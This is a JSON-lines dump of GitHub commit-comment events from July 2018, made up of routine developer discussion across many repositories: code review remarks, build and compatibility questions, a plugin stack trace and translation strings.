{"id":"7970317317","type":"CommitCommentEvent","actor":{"login":"wentasah"},"repo":{"name":"Shanigen/kcf"},"payload":{"comment":{"id":29719579,"position":17,"line":578,"path":"src/kcf.cpp","commit_id":"7c682ed29bfd43da46e6abcaf2d8b5bcaea184fd","created_at":"2018-07-16T12:22:39Z","updated_at":"2018-07-16T12:22:39Z","author_association":"COLLABORATOR","body":"Why do you pass both scale and size_x/y to the function? I guess that scale can be easily calculated by patch.cols/size_x."}},"created_at":"2018-07-16T12:22:39Z"}
{"id":"7970318440","type":"CommitCommentEvent","actor":{"login":"OndraZizka"},"repo":{"name":"eulerto/wal2json"},"payload":{"comment":{"id":29719580,"position":63,"line":63,"path":"sql/filtertable.sql","commit_id":"409fcff4478743d161eb0358d26930773335767a","created_at":"2018-07-16T12:22:54Z","updated_at":"2018-07-16T12:22:54Z","author_association":"NONE","body":"I'm looking for a documentation of how to pass the filter-tables parameter along with other parameters.\r\nMy guess is:\r\n\r\n    -o \"filter-tables=<schema>.<table>,<schema>.<table>,...\" -o other-option=...\r\n\r\nIs that correct?"}},"created_at":"2018-07-16T12:22:54Z"}
{"id":"7970319200","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"Gnat008/perworldinventory-kt"},"payload":{"comment":{"id":29719582,"position":null,"line":null,"path":null,"commit_id":"8fe3d7dd88fd8e3758f71b3a3a78e6c8510d7476","created_at":"2018-07-16T12:23:04Z","updated_at":"2018-07-16T12:23:04Z","author_association":"NONE","body":"@Gnat008 Does this commit make PWI 1.13 only? It loads on 1.12 but errors with PLAYER_HEAD being loaded in an inventory.\r\n\r\n```\r\n[05:12:35] [Craft Scheduler Thread - 45/WARN]: [PerWorldInventory] Plugin PerWorldInventory v2.0.1 generated an exception while executing task 12359\r\njava.lang.NoSuchFieldError: PLAYER_HEAD\r\n\tat me.ebonjaeger.perworldinventory.serialization.ItemSerializer.serialize(ItemSerializer.kt:49) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.serialization.InventorySerializer.serializeInventory(InventorySerializer.kt:43) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.serialization.PlayerSerializer.serialize(PlayerSerializer.kt:33) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.data.FlatFile.savePlayer(FlatFile.kt:44) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.data.ProfileManager$addPlayerProfile$1.invoke(ProfileManager.kt:59) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.data.ProfileManager$addPlayerProfile$1.invoke(ProfileManager.kt:20) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.service.BukkitService$sam$java_lang_Runnable$0.run(BukkitService.kt) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat org.bukkit.craftbukkit.v1_12_R1.scheduler.CraftTask.run(CraftTask.java:63) ~[patched_1.12.2.jar:git-Paper-1500]\r\n\tat org.bukkit.craftbukkit.v1_12_R1.scheduler.CraftAsyncTask.run(CraftAsyncTask.java:52) [patched_1.12.2.jar:git-Paper-1500]\r\n\tat com.destroystokyo.paper.ServerSchedulerReportingWrapper.run(ServerSchedulerReportingWrapper.java:22) [patched_1.12.2.jar:git-Paper-1500]\r\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [?:1.8.0_172]\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [?:1.8.0_172]\r\n\tat java.lang.Thread.run(Thread.java:748) [?:1.8.0_172]\r\n[05:12:35] [Craft Scheduler Thread - 52/WARN]: [PerWorldInventory] Plugin PerWorldInventory v2.0.1 generated an exception while executing task 12353\r\njava.lang.NoSuchFieldError: PLAYER_HEAD\r\n\tat me.ebonjaeger.perworldinventory.serialization.ItemSerializer.serialize(ItemSerializer.kt:49) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.serialization.InventorySerializer.serializeInventory(InventorySerializer.kt:43) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.serialization.PlayerSerializer.serialize(PlayerSerializer.kt:33) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.data.FlatFile.savePlayer(FlatFile.kt:44) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.data.ProfileManager$addPlayerProfile$1.invoke(ProfileManager.kt:59) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.data.ProfileManager$addPlayerProfile$1.invoke(ProfileManager.kt:20) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat me.ebonjaeger.perworldinventory.service.BukkitService$sam$java_lang_Runnable$0.run(BukkitService.kt) ~[perworldinventory-kt-2.0.1.jar:?]\r\n\tat org.bukkit.craftbukkit.v1_12_R1.scheduler.CraftTask.run(CraftTask.java:63) ~[patched_1.12.2.jar:git-Paper-1500]\r\n\tat org.bukkit.craftbukkit.v1_12_R1.scheduler.CraftAsyncTask.run(CraftAsyncTask.java:52) [patched_1.12.2.jar:git-Paper-1500]\r\n\tat com.destroystokyo.paper.ServerSchedulerReportingWrapper.run(ServerSchedulerReportingWrapper.java:22) [patched_1.12.2.jar:git-Paper-1500]\r\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [?:1.8.0_172]\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [?:1.8.0_172]\r\n\tat java.lang.Thread.run(Thread.java:748) [?:1.8.0_172]\r\n```"}},"created_at":"2018-07-16T12:23:04Z"}
{"id":"7970320558","type":"CommitCommentEvent","actor":{"login":"khusika"},"repo":{"name":"android-linux-stable/msm-3.18"},"payload":{"comment":{"id":29719585,"position":null,"line":null,"path":null,"commit_id":"9fbe13978f9f0f093ce4d986593e75b9abea86bd","created_at":"2018-07-16T12:23:21Z","updated_at":"2018-07-16T12:23:21Z","author_association":"NONE","body":"Hi @nathanchance , why the latest commits of _binder_alloc.c_ are missing in the [drivers/staging/android/binder_alloc.c](https://github.com/android-linux-stable/msm-3.18/commits/kernel.lnx.3.18.r33-rel/drivers/staging/android/binder_alloc.c), for example with this commit? While i check this in the [drivers/staging/android](https://github.com/android-linux-stable/msm-3.18/commits/kernel.lnx.3.18.r33-rel/drivers/staging/android) this commit is exist"}},"created_at":"2018-07-16T12:23:21Z"}
{"id":"7970323540","type":"CommitCommentEvent","actor":{"login":"abbasali"},"repo":{"name":"nupur-batra/sample_project"},"payload":{"comment":{"id":29719592,"position":5,"line":12,"path":"config/Migrations/20180712133319_Initial.php","commit_id":"44a9e6bfed9668518d0c0d84f8ac0350a6c9af32","created_at":"2018-07-16T12:24:01Z","updated_at":"2018-07-16T12:24:01Z","author_association":"NONE","body":"Ok"}},"created_at":"2018-07-16T12:24:01Z"}
{"id":"7970324693","type":"CommitCommentEvent","actor":{"login":"Glass-Build-Github"},"repo":{"name":"mikeedwards83/Glass.Mapper"},"payload":{"comment":{"id":29719594,"position":5,"line":641,"path":"Source/Glass.Mapper.Sc/GlassHtml.cs","commit_id":"52338bde98e6c9444ad6e3238956cabdbbe58d5e","created_at":"2018-07-16T12:24:16Z","updated_at":"2018-07-16T12:24:16Z","author_association":"COLLABORATOR","body":"Which version are you using?\n\nOn Mon, 16 Jul 2018, 13:19 Jorrit Schippers, <notifications@github.com>\nwrote:\n\n> This change causes a build failure because\n> dictionary[RenderParameterKeys.DisableWebEdit] is a string and it is used\n> as a bool.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mikeedwards83/Glass.Mapper/commit/52338bde98e6c9444ad6e3238956cabdbbe58d5e#commitcomment-29719525>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AT1mznkYPCsy1X9xnJYAHzlSpML-6b4Jks5uHITTgaJpZM4VRBsI>\n> .\n>\n"}},"created_at":"2018-07-16T12:24:16Z"}
{"id":"7970346680","type":"CommitCommentEvent","actor":{"login":"larsoner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29719648,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T12:29:06Z","updated_at":"2018-07-16T12:29:06Z","author_association":"COLLABORATOR","body":"We need a deprecation cycle. So under the hood `stc.morph` when called a certain way should emit a `DeprecationWarning` and do the code you pasted above.\r\n\r\nThinking back, I might have advocated for not deprecating since `stc.morph` and `stc.morph_precomputed` are probably all over the place in user code. So now I'm conflicted on whether we should deprecate or not. What you have already might be fine...?"}},"created_at":"2018-07-16T12:29:06Z"}
{"id":"7970347095","type":"CommitCommentEvent","actor":{"login":"vovapasko"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29719650,"position":48,"line":34,"path":"DBConnector.py","commit_id":"bb9ff2d8662a9c5d164d65fb3a01cb153a35be7c","created_at":"2018-07-16T12:29:11Z","updated_at":"2018-07-16T12:29:11Z","author_association":"OWNER","body":"Есть ли смысл использовать это здесь? Может лучше отделить данные получаемые при запросе от сохранения в бд. Я имею в виду, может будет лучше, если данные для сохранения будут передаваться как параметр методу?\r\n`def insert_into_main_table(self, data1): `\r\nТаким образом метод будет более универсальным, который сохраняет в бд любые данные, которые ему дадут, а не только те, которые извлекаются при этом запросе."}},"created_at":"2018-07-16T12:29:11Z"}
{"id":"7970350124","type":"CommitCommentEvent","actor":{"login":"larsoner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29719655,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T12:29:46Z","updated_at":"2018-07-16T12:29:46Z","author_association":"COLLABORATOR","body":"(I also thought for a minute the code you pasted above was part of the SourceMorph class, which we definitely don't want. If it's just a `SourceEstimate` method, this seems fine to me, no need to remove or deprecate I think.)"}},"created_at":"2018-07-16T12:29:46Z"}
{"id":"7970355304","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29719669,"position":null,"line":null,"path":null,"commit_id":"ba7a8db0e8f70fa3ee29a0f8d3fd6a8e159ae85c","created_at":"2018-07-16T12:30:44Z","updated_at":"2018-07-16T12:30:44Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/custom-footer-disappears-on-some-profile-pages/87900/4\n"}},"created_at":"2018-07-16T12:30:44Z"}
{"id":"7970361650","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29719677,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T12:32:05Z","updated_at":"2018-07-16T12:32:05Z","author_association":"NONE","body":"yeah it would be like you say - the above would be the return within ``source_estimate`` - the class itself would always force pre-computation - however I would like to follow @agramfort 's suggestion to have a precomputed=data option, to support the morph_data_precomputed API better - would that be fine?"}},"created_at":"2018-07-16T12:32:05Z"}
{"id":"7970362450","type":"CommitCommentEvent","actor":{"login":"mickaelandrieu"},"repo":{"name":"PrestaShop/PrestaShop"},"payload":{"comment":{"id":29719680,"position":33,"line":33,"path":"src/Adapter/Presenter/Order/OrderReturnLazyArray.php","commit_id":"f3630ef28320bc2cf3e4dedb220a0b4a9e1696d6","created_at":"2018-07-16T12:32:15Z","updated_at":"2018-07-16T12:32:15Z","author_association":"CONTRIBUTOR","body":"this miss PHPDocs here :/"}},"created_at":"2018-07-16T12:32:15Z"}
{"id":"7970364125","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29719683,"position":null,"line":null,"path":null,"commit_id":"b4453094512af108bc07071599d3c29b46588049","created_at":"2018-07-16T12:32:36Z","updated_at":"2018-07-16T12:32:36Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-1](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-16T12:32:36Z"}
{"id":"7970365262","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29719684,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T12:32:51Z","updated_at":"2018-07-16T12:32:51Z","author_association":"NONE","body":"(I'm asking because it slightly breaks the logic of the rest of the SourceMorph class)"}},"created_at":"2018-07-16T12:32:51Z"}
{"id":"7970369228","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29719700,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T12:33:42Z","updated_at":"2018-07-16T12:33:42Z","author_association":"NONE","body":"(or in other words I would like to deprecate ``mne.compute_morph_matrix``)"}},"created_at":"2018-07-16T12:33:42Z"}
{"id":"7970372207","type":"CommitCommentEvent","actor":{"login":"YannisDejonghe"},"repo":{"name":"YannisDejonghe/DiscBot"},"payload":{"comment":{"id":29719706,"position":null,"line":null,"path":null,"commit_id":"9379db1e7d97d6a339acb117ff0c01e51742bebc","created_at":"2018-07-16T12:34:20Z","updated_at":"2018-07-16T12:34:20Z","author_association":"OWNER","body":"beautify cucked some code though sorry"}},"created_at":"2018-07-16T12:34:20Z"}
{"id":"7970375462","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29719711,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T12:34:56Z","updated_at":"2018-07-16T12:34:56Z","author_association":"OWNER","body":"what do you need to precompute? src_from ? src_to?\n\ncan you do it on the fly when calling the class and still get a good\nperformance?\n"}},"created_at":"2018-07-16T12:34:56Z"}
{"id":"7970376812","type":"CommitCommentEvent","actor":{"login":"nupur-batra"},"repo":{"name":"nupur-batra/sample_project"},"payload":{"comment":{"id":29719716,"position":32,"line":32,"path":"src/Template/FormDetails/index.ctp","commit_id":"44a9e6bfed9668518d0c0d84f8ac0350a6c9af32","created_at":"2018-07-16T12:35:12Z","updated_at":"2018-07-16T12:35:12Z","author_association":"OWNER","body":"All i know in brief is,it returns STRING."}},"created_at":"2018-07-16T12:35:12Z"}
{"id":"7970379453","type":"CommitCommentEvent","actor":{"login":"TheKingDiamond"},"repo":{"name":"deeplearning4j/deeplearning4j"},"payload":{"comment":{"id":29719723,"position":null,"line":null,"path":null,"commit_id":"32a929c576e24acba4c29c0fc78895ea7794c20e","created_at":"2018-07-16T12:35:45Z","updated_at":"2018-07-16T12:35:45Z","author_association":"NONE","body":"Thank you @raver119 !"}},"created_at":"2018-07-16T12:35:45Z"}
{"id":"7970380568","type":"CommitCommentEvent","actor":{"login":"jocel1"},"repo":{"name":"PrestaShop/PrestaShop"},"payload":{"comment":{"id":29719726,"position":33,"line":33,"path":"src/Adapter/Presenter/Order/OrderReturnLazyArray.php","commit_id":"f3630ef28320bc2cf3e4dedb220a0b4a9e1696d6","created_at":"2018-07-16T12:35:59Z","updated_at":"2018-07-16T12:35:59Z","author_association":"CONTRIBUTOR","body":"will put them back asap :)"}},"created_at":"2018-07-16T12:35:59Z"}
{"id":"7970383508","type":"CommitCommentEvent","actor":{"login":"weavejester"},"repo":{"name":"weavejester/cljfmt"},"payload":{"comment":{"id":29719730,"position":null,"line":null,"path":null,"commit_id":"439a2503e2d7e94ea57b7bb43a1ac4664d45d7b7","created_at":"2018-07-16T12:36:36Z","updated_at":"2018-07-16T12:36:36Z","author_association":"OWNER","body":"Yes, as soon as I fix all the issues around it."}},"created_at":"2018-07-16T12:36:36Z"}
{"id":"7970383998","type":"CommitCommentEvent","actor":{"login":"cioan"},"repo":{"name":"PIH/openmrs-module-pihmalawi"},"payload":{"comment":{"id":29719731,"position":26,"line":75,"path":"omod/src/main/webapp/resources/htmlforms/chf_visit.xml","commit_id":"6cb02904242d180033829216d6b7de9a7b2592d8","created_at":"2018-07-16T12:36:42Z","updated_at":"2018-07-16T12:36:42Z","author_association":"MEMBER","body":"Hi @tlimbani , UUID just for new concepts is fine. Sorry, I could not tell those were old concepts. Thanks!"}},"created_at":"2018-07-16T12:36:42Z"}
{"id":"7970384852","type":"CommitCommentEvent","actor":{"login":"sadatnfs"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29719733,"position":null,"line":null,"path":null,"commit_id":"03ab64c3a68f3b990bf690ede06e3066ad4e35a0","created_at":"2018-07-16T12:36:53Z","updated_at":"2018-07-16T12:36:53Z","author_association":"NONE","body":"Yeah the PR hasn't been merged yet. But I can confirm that I can build with MKL with that small fix. "}},"created_at":"2018-07-16T12:36:53Z"}
{"id":"7970390136","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29719754,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T12:37:59Z","updated_at":"2018-07-16T12:37:59Z","author_association":"NONE","body":"no I mean: if ``compute_morph_matrix`` and ``morph_precomputed`` in ``SourceEstimate`` is not deprecated, then it would be handy to have a option to pass the result from ``compute_morph_matrix`` directly - such that in ``SourceEstimate`` it looks like:\r\n```\r\n\r\n    return SourceMorph(subject_from=subject_from,\r\n                       subject_to=subject_to,\r\n                       precomputed={'vertno': vertices_to,\r\n                                    'morph_mat': morph_mat})(stc_from)\r\n```\r\nanother option would be a private function only for the purpose of wrapping the API at this point?"}},"created_at":"2018-07-16T12:37:59Z"}
{"id":"7970390623","type":"CommitCommentEvent","actor":{"login":"mdraselahmed25"},"repo":{"name":"gliderlabs/docker-alpine"},"payload":{"comment":{"id":29719755,"position":null,"line":null,"path":null,"commit_id":"43ca9b2237eb992f482d4ad6d85b7e5c940337e9","created_at":"2018-07-16T12:38:05Z","updated_at":"2018-07-16T12:38:05Z","author_association":"NONE","body":"788113"}},"created_at":"2018-07-16T12:38:05Z"}
{"id":"7970398403","type":"CommitCommentEvent","actor":{"login":"jeanlucaslima"},"repo":{"name":"danizavtz/tokenAuth"},"payload":{"comment":{"id":29719773,"position":32,"line":29,"path":"app.js","commit_id":"54b605568d4fe077554951046371d1d19bf0cdfe","created_at":"2018-07-16T12:39:43Z","updated_at":"2018-07-16T12:39:43Z","author_association":"NONE","body":"This error is not in English."}},"created_at":"2018-07-16T12:39:43Z"}
{"id":"7970402523","type":"CommitCommentEvent","actor":{"login":"daisies7779"},"repo":{"name":"daisies7779/hello-world"},"payload":{"comment":{"id":29719779,"position":null,"line":null,"path":null,"commit_id":"7202fb65e324fa0fc7204d830f9109f08ff4e934","created_at":"2018-07-16T12:40:36Z","updated_at":"2018-07-16T12:40:36Z","author_association":"OWNER","body":"This is another test, testing how comment function works."}},"created_at":"2018-07-16T12:40:36Z"}
{"id":"7970403086","type":"CommitCommentEvent","actor":{"login":"djowdobom"},"repo":{"name":"djowdobom/esx_policejob"},"payload":{"comment":{"id":29719782,"position":null,"line":null,"path":null,"commit_id":"16694a7e20ae71821a46e1c0da3706cb3c1c851f","created_at":"2018-07-16T12:40:43Z","updated_at":"2018-07-16T12:40:43Z","author_association":"OWNER","body":"Missing \"Boss Actions\" for [BR] locale\r\n\r\n>   -- Boss Menu\r\n  ['take_company_money'] = 'retirar dinheiro da companhia',\r\n  ['deposit_money'] = 'depositar dinheiro',\r\n  ['amount_of_withdrawal'] = 'quantidade a retirar',\r\n  ['invalid_amount'] = 'valor inválido',\r\n  ['amount_of_deposit'] = 'quantidade a depositar',\r\n  ['open_bossmenu'] = 'aperte ~y~E~w~ para acessar o menu',\r\n  ['quantity_invalid'] = 'quantidade inválida',\r\n  ['have_withdrawn'] = 'você retirou x',\r\n  ['not_enough_in_society'] = 'não tem ~r~este item ~s~ suficiente na sociedade!',\r\n  ['player_cannot_hold'] = 'você ~r~não~s~ tem ~y~espaço vazio~s~ no seu inventário!',\r\n  ['added'] = 'você adicionou x',\r\n  ['quantity'] = 'quantidade',\r\n  ['inventory'] = 'inventário',\r\n  ['police_stock'] = 'Estoque da Polícia',"}},"created_at":"2018-07-16T12:40:43Z"}
{"id":"7970405519","type":"CommitCommentEvent","actor":{"login":"daisies7779"},"repo":{"name":"daisies7779/hello-world"},"payload":{"comment":{"id":29719785,"position":null,"line":null,"path":null,"commit_id":"7202fb65e324fa0fc7204d830f9109f08ff4e934","created_at":"2018-07-16T12:41:12Z","updated_at":"2018-07-16T12:41:12Z","author_association":"OWNER","body":"Conversation is closed."}},"created_at":"2018-07-16T12:41:12Z"}
{"id":"7970410494","type":"CommitCommentEvent","actor":{"login":"cerminar"},"repo":{"name":"cerminar/cmssw"},"payload":{"comment":{"id":29719798,"position":null,"line":null,"path":null,"commit_id":"7a9e16c035e66a43a32980031ef8165542164940","created_at":"2018-07-16T12:42:13Z","updated_at":"2018-07-16T12:42:13Z","author_association":"OWNER","body":"Hello @rekovic,\r\nindeed I addressed this problem with the data formats in some branch and Jean-Baptiste is about to propagate this to all the relevant places.\r\nI have been offline in the last two weeks and I am catching up. Among other things, the evaluation of the performance of these ID criteria is very high in my priority list....I wrote the egamma lines without any chance to actually test them. Of course if we can get these objects in the  L1 ntuples it would be easier for everybody.\r\n\r\nCheers,\r\nG\r\n\r\n"}},"created_at":"2018-07-16T12:42:13Z"}
{"id":"7970414897","type":"CommitCommentEvent","actor":{"login":"raydittmeier"},"repo":{"name":"USGS-EROS/landsat-qa-arcgis-toolbox"},"payload":{"comment":{"id":29719809,"position":null,"line":null,"path":null,"commit_id":"8c2c88bce0f4fbdc340de7c440f55184f9b32a34","created_at":"2018-07-16T12:43:10Z","updated_at":"2018-07-16T12:43:10Z","author_association":"NONE","body":"The changes look good."}},"created_at":"2018-07-16T12:43:10Z"}
{"id":"7970420220","type":"CommitCommentEvent","actor":{"login":"elifaln"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29719816,"position":null,"line":null,"path":null,"commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-16T12:44:16Z","updated_at":"2018-07-16T12:44:16Z","author_association":"NONE","body":"Thank @Soulofdestiny for that!\r\n\r\nI have some question about procedure:\r\n\r\n1) What happen if one test case failed? \r\n\r\nso for example one of them:\r\nloadtest \"s390-tests/consoletest_chzdev_lszdev\";\r\nloadtest \"s390-tests/consoletest_chccwdev\";\r\nloadtest \"s390-tests/consoletest_kernel_1\";\r\nloadtest \"s390-tests/consoletest_vmconvert\";\r\nloadtest \"s390-tests/consoletest_MEMORY_chmem\";\r\nloadtest \"s390-tests/consoletest_KERNEL_LSCPU_CHCPU\";\r\n\r\nWill be the next test cases start? \r\n\r\nOur test cases are independent from each other and therefore all test cases should executed no matter if one of the previous one is failed.\r\n\r\n2) What happen if a test case requires a reboot of a z/VM guest, would it work? \r\nIf that will work, have you an example for us?"}},"created_at":"2018-07-16T12:44:16Z"}
{"id":"7970423505","type":"CommitCommentEvent","actor":{"login":"deepakkapse"},"repo":{"name":"deepakkapse/destination"},"payload":{"comment":{"id":29719822,"position":null,"line":null,"path":null,"commit_id":"b444ec6658b834a9172d49527d327f2d6f7282d2","created_at":"2018-07-16T12:44:58Z","updated_at":"2018-07-16T12:44:58Z","author_association":"OWNER","body":"abbbhaaaa...found\r\n"}},"created_at":"2018-07-16T12:44:58Z"}
{"id":"7970425851","type":"CommitCommentEvent","actor":{"login":"nadavb"},"repo":{"name":"tensorflow/tensor2tensor"},"payload":{"comment":{"id":29719827,"position":47,"line":97,"path":"tensor2tensor/serving/README.md","commit_id":"66e644fd0656d7b0b177c3b14eefe3a35611e016","created_at":"2018-07-16T12:45:25Z","updated_at":"2018-07-16T12:45:25Z","author_association":"CONTRIBUTOR","body":"Will the Cloud ML automatically run (predict) the model on a GPU? Or anything should be set in the exported (SavedModel) model? Personally, I keep getting \"Prediction server is out of memory\" from the CloudML (using transformer_base model)"}},"created_at":"2018-07-16T12:45:25Z"}
{"id":"7970426182","type":"CommitCommentEvent","actor":{"login":"blueMoodBHD"},"repo":{"name":"espressif/esp-idf"},"payload":{"comment":{"id":29719828,"position":15,"line":117,"path":"examples/bluetooth/a2dp_sink/main/main.c","commit_id":"21af1d73399d5f70ca7799ef90a233e0d0e7e52c","created_at":"2018-07-16T12:45:30Z","updated_at":"2018-07-16T12:45:30Z","author_association":"COLLABORATOR","body":"Hi, because we can't access `BT_SSP_INCLUDED`, now. Please  replace `#if (BT_SPP_INCLUDED)` as `#ifdef CONFIG_BT_SSP_ENABLE`, or just delete it, I will fix it, soon.\r\n\r\nBy the way, The iocap of most phone is `ESP_BT_IO_CAP_IO`. So, \r\n1. If set set the iocap as `ESP_BT_IO_CAP_IN`, it will show ping code at phone and input it at ESP32.\r\n2. If set set the iocap as `ESP_BT_IO_CAP_IO`, it will show ping code both side and compare it.\r\n3. If set set the iocap as `ESP_BT_IO_CAP_OUT` or `ESP_BT_IO_CAP_NONE`, it will not use ping code."}},"created_at":"2018-07-16T12:45:30Z"}
{"id":"7970428288","type":"CommitCommentEvent","actor":{"login":"nupur-batra"},"repo":{"name":"nupur-batra/sample_project"},"payload":{"comment":{"id":29719832,"position":1,"line":1,"path":"tests/Fixture/FormDetailsFixture.php","commit_id":"44a9e6bfed9668518d0c0d84f8ac0350a6c9af32","created_at":"2018-07-16T12:45:57Z","updated_at":"2018-07-16T12:45:57Z","author_association":"OWNER","body":"- When testing code that depends on models and the database, one can use fixtures as a way to generate temporary data tables loaded with sample data that can be used by the test.\r\n-In brief it is used for testing purpose and fixtures files are generated when we bake bake tables. "}},"created_at":"2018-07-16T12:45:57Z"}
{"id":"7970428887","type":"CommitCommentEvent","actor":{"login":"Dorostkar"},"repo":{"name":"Dorostkar/mocha-test"},"payload":{"comment":{"id":29719835,"position":4,"line":14,"path":"package.json","commit_id":"7a2287f6295eb89407e7d4d1145e8cf9d082a7cb","created_at":"2018-07-16T12:46:05Z","updated_at":"2018-07-16T12:46:05Z","author_association":"OWNER","body":"we need this library to work with promise"}},"created_at":"2018-07-16T12:46:05Z"}
{"id":"7970429092","type":"CommitCommentEvent","actor":{"login":"tscholak"},"repo":{"name":"ekmett/recursion-schemes"},"payload":{"comment":{"id":29719837,"position":17,"line":540,"path":"Data/Functor/Foldable.hs","commit_id":"78eabde55e876deb18d3a69465f568982c2459f2","created_at":"2018-07-16T12:46:08Z","updated_at":"2018-07-16T12:46:08Z","author_association":"NONE","body":"it might be possible to specialize your `hoist` for `Mu` and `Nu` using ghc pragmas: https://downloads.haskell.org/~ghc/8.2-latest/docs/html/users_guide/glasgow_exts.html#specialize-pragma"}},"created_at":"2018-07-16T12:46:08Z"}
{"id":"7970430394","type":"CommitCommentEvent","actor":{"login":"Pentarctagon"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29719839,"position":null,"line":null,"path":null,"commit_id":"3290961db2eb00221c94f88f02f77ab640f497a4","created_at":"2018-07-16T12:46:23Z","updated_at":"2018-07-16T12:46:23Z","author_association":"MEMBER","body":"Whoops, my bad.  I can't add anything to the release notes about a changed dependency until I know what dependency actually changed though, and so far you're the only person to say that there's an issue, so more information is needed from you beyond just that you weren't able to compile."}},"created_at":"2018-07-16T12:46:23Z"}
{"id":"7970435606","type":"CommitCommentEvent","actor":{"login":"Dorostkar"},"repo":{"name":"Dorostkar/mocha-test"},"payload":{"comment":{"id":29719846,"position":28,"line":59,"path":"test/controllers/auth.controller.test.js","commit_id":"7a2287f6295eb89407e7d4d1145e8cf9d082a7cb","created_at":"2018-07-16T12:47:29Z","updated_at":"2018-07-16T12:47:29Z","author_association":"OWNER","body":"eventually appears when we add chai as promise as middleware also run chai.should()\r\ndont forget return "}},"created_at":"2018-07-16T12:47:29Z"}
{"id":"7970438824","type":"CommitCommentEvent","actor":{"login":"abbasali"},"repo":{"name":"nupur-batra/sample_project"},"payload":{"comment":{"id":29719854,"position":1,"line":1,"path":"tests/Fixture/FormDetailsFixture.php","commit_id":"44a9e6bfed9668518d0c0d84f8ac0350a6c9af32","created_at":"2018-07-16T12:48:09Z","updated_at":"2018-07-16T12:48:09Z","author_association":"NONE","body":"Ok - and have you written tests for this app? i.e. to test whether add/edit/delete works for FormDetail?"}},"created_at":"2018-07-16T12:48:09Z"}
{"id":"7970440988","type":"CommitCommentEvent","actor":{"login":"mia0x75"},"repo":{"name":"ShadowsocksR-Live/shadowsocksr-native"},"payload":{"comment":{"id":29719858,"position":20,"line":0,"path":"README.md","commit_id":"72d0c52a43001d1bc0558d1e0ab240b7a4b35697","created_at":"2018-07-16T12:48:34Z","updated_at":"2018-07-16T12:48:34Z","author_association":"NONE","body":"only support cmake 3.11.4?"}},"created_at":"2018-07-16T12:48:34Z"}
